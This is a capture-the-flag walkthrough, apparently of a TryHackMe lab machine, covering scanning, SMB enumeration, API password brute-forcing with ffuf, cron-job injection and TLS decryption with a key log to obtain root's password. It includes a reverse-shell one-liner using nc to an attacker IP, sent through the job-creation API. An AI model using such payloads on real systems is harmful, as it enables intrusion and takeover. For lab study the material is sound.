Port scan

sudo nmap --min-rate 10000 -p- 10.10.201.190
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 03:43 UTC
Nmap scan report for 10.10.201.190
Host is up (0.38s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3000/tcp open ppp
5000/tcp open upnp

Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds
sudo nmap -sT -sV -sC -O -p22,80,139,445,3000,5000 10.10.201.190
[sudo] mikannse 的密码:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 03:44 UTC
Nmap scan report for 10.10.201.190
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:f4:43:ac:39:fe:94:13:7a:ad:3d:e6:5f:b4:7e:71 (RSA)
| 256 49:8c:75:e1:78:e9:72:65:de:c9:14:74:0f:d4:1a:81 (ECDSA)
|_ 256 0b:b6:27:f9:ad:ed:22:a9:90:ac:9e:b3:85:1b:aa:96 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 174
| Date: Mon, 04 Dec 2023 03:44:35 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /nice%20ports%2C/Tri%6Eity.txt%2ebak</pre>
| </body>
| </html>
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Mon, 04 Dec 2023 03:44:28 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Mon, 04 Dec 2023 03:44:30 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
5000/tcp open ssl/http Node.js (Express middleware)
| tls-nextprotoneg:
| http/1.1
|_ http/1.0
| ssl-cert: Subject: organizationName=Motunui/stateOrProvinceName=Motunui/countryName=GB
| Not valid before: 2020-08-03T14:58:59
|_Not valid after: 2021-08-03T14:58:59
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: MOTUNUI; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: motunui
| NetBIOS computer name: MOTUNUI\x00
| Domain name: \x00
| FQDN: motunui
|_ System time: 2023-12-04T03:45:02+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2023-12-04T03:45:01
|_ start_date: N/A
|_nbstat: NetBIOS name: MOTUNUI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 1s, median: 0s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.57 seconds

SMB enumeration

smbmap -H 10.10.201.190

This yields a share named traces.

smbclient //10.10.201.190/traces

It contains a pile of packet captures, but only maui's is useful; download it. Opening it in Wireshark, most of the traffic turns out to be encrypted. One HTTP stream is very suspicious: it carries an image, and exporting it reveals a URL, d3v3lopm3nt.motunui.thm. Add it to hosts.

Web

Visiting it shows the Apache default page; at the same time, fuzz for other subdomains.

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://motunui.thm' -H 'HOST:FUZZ.motunui.thm' -fs 10918

It looks like there are none; visit the subdomain found earlier.

It says it is for developers.

A directory scan finds docs; visiting it yields a README.md.

# Documentation for the in-development API

##### [Changelog](CHANGELOG.md) | [Issues](ISSUES.md)

Please do not distribute this documentation outside of the development team.

## Routes

Find all of the routes [here](ROUTES.md).

It turns out there are three more .md files; download all of them from docs.

However, only the routes file has any content.

# Routes

The base URL for the api is `api.motunui.thm:3000/v2/`.

### `POST /login`

Returns the hash for the specified user to be used for authorisation.

#### Parameters

- `username`
- `password`

#### Response (200)

```js
{
"hash": String()
}
```

#### Response (401)

```js
{
"error": "invalid credentials"
}
```

### 🔐 `GET /jobs`

Returns all the cron jobs running as the current user.

#### Parameters

- `hash`

#### Response (200)

```js
{
"jobs": Array()
}
```

#### Response (403)

```js
{
"error": "you are unauthorised to view this resource"
}
```

### 🔐 `POST /jobs`

Creates a new cron job running as the current user.

#### Parameters

- `hash`

#### Response (201)

```js
{
"job": String()
}
```

#### Response (401)

```js
{
"error": "you are unauthorised to view this resource"
}
```

Getshell

This gives another subdomain (api.motunui.thm); add it to hosts.

There appear to be two routes, login and jobs, but they need a username and password, and so far we have nothing.

Looking at the v1 version of the API, a POST to login tells us to log in as maui. Maybe the password can be brute-forced.

ffuf -w /usr/share/wordlists/rockyou.txt -u 'http://api.motunui.thm:3000/v2/login' -H 'Content-Type: application/json' -d '{"username":"maui","password":"FUZZ"}' -fs 31

The password is island (THM's Kali is really fast).

curl -H 'Content-Type: application/json' -d '{"username":"maui","password":"island"}' -XPOST http://api.motunui.thm:3000/v2/login

This returns {"hash":"aXNsYW5k"}.

curl -H 'Content-Type: application/json' -d '{"hash":"aXNsYW5k","job":"* * * * * rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.11.38.245 1234 >/tmp/f" }' -XPOST http://api.motunui.thm:3000/v2/jobs

Add a crontab entry containing a reverse shell.

Privilege escalation

The moana user's home directory has a readme asking us to finish a Packet Tracer network and warning against password reuse. Packet Tracer is Cisco's software for learning computer networking; its files have the .pkt extension.

find / -name "*.pkt" 2>/dev/null

Open it in the software, open the switch's config, export the running configuration and find moana's password in it: H0wF4ri'LLG0

Next comes privilege escalation proper. In /var/www there is also a tls directory containing the public/private key pair used for TLS, plus the Node.js script the site runs, in which the private key's password is found: Password1.

Recalling the TLS-encrypted traffic in the capture found on SMB earlier, I tried this key, but oddly it immediately gave an error; maybe this is a rabbit hole.

In /etc/ there is also an ssl.txt, which is how I learned that an SSL log can also be used to decrypt.

In Wireshark go to "Edit" -> "Preferences" -> "Protocols" -> "TLS" and import the log; a lot more HTTP traffic appears, and in it is root's password: Pl3aseW0rk
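An added example, not from the writeup: a parser for the NSS key log format that Wireshark's TLS preference reads, which is what a file like the ssl.txt above contains. A key log records per-session secrets, so it decrypts sessions that a server's RSA private key alone cannot (any session negotiated with an ephemeral key exchange); the sample lines and hex values are constructed and do not come from the box.

```javascript
// Added example (not the box's code): parse an NSS key log and answer
// "could this file decrypt the session with this client_random?".
// SAMPLE_KEYLOG is constructed; the hex values are placeholders.
const SAMPLE_KEYLOG = [
  '# SSL/TLS secrets log file, generated by NSS',
  'CLIENT_RANDOM ' + '11'.repeat(32) + ' ' + '22'.repeat(48),                   // TLS 1.2
  'CLIENT_HANDSHAKE_TRAFFIC_SECRET ' + '33'.repeat(32) + ' ' + '44'.repeat(32), // TLS 1.3
  'SERVER_TRAFFIC_SECRET_0 ' + '33'.repeat(32) + ' ' + '55'.repeat(32),
  'this line is garbage',
].join('\n');

const TLS12_LABELS = new Set(['CLIENT_RANDOM']);
const TLS13_LABELS = new Set([
  'CLIENT_EARLY_TRAFFIC_SECRET', 'CLIENT_HANDSHAKE_TRAFFIC_SECRET',
  'SERVER_HANDSHAKE_TRAFFIC_SECRET', 'CLIENT_TRAFFIC_SECRET_0',
  'SERVER_TRAFFIC_SECRET_0', 'EXPORTER_SECRET',
]);
const HEX = /^[0-9a-fA-F]+$/;

// Returns { sessions: Map<clientRandomHex, {version, secrets}>, rejected }.
// Each line is "<LABEL> <32-byte client_random hex> <secret hex>"; the
// TLS 1.2 master secret is always 48 bytes (96 hex chars).
function parseKeyLog(text) {
  const sessions = new Map();
  let rejected = 0;
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    if (!line || line.startsWith('#')) continue;
    const parts = line.split(/\s+/);
    const [label, clientRandom, secret] = parts;
    const isTls12 = TLS12_LABELS.has(label);
    const isTls13 = TLS13_LABELS.has(label);
    if (parts.length !== 3 || !(isTls12 || isTls13) ||
        clientRandom.length !== 64 || !HEX.test(clientRandom) ||
        !HEX.test(secret) || (isTls12 && secret.length !== 96)) {
      rejected++;
      continue;
    }
    const key = clientRandom.toLowerCase();
    const entry = sessions.get(key) ||
      { version: isTls12 ? 'TLS1.2' : 'TLS1.3', secrets: {} };
    entry.secrets[label] = secret.toLowerCase();
    sessions.set(key, entry);
  }
  return { sessions, rejected };
}

// client_random as Wireshark shows it in the ClientHello (hex, any case).
function canDecrypt(sessions, clientRandomHex) {
  return sessions.has(clientRandomHex.toLowerCase());
}
```

Run against a real key log, `rejected` is a quick sanity check that the file is actually in this format before loading it into Wireshark.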

Afterthoughts

Another API box; it comes down to POST requests and JSON and the like, but it was still quite fun. Some parts take a fair bit of imagination. I need to go and learn about SSL/TLS encryption.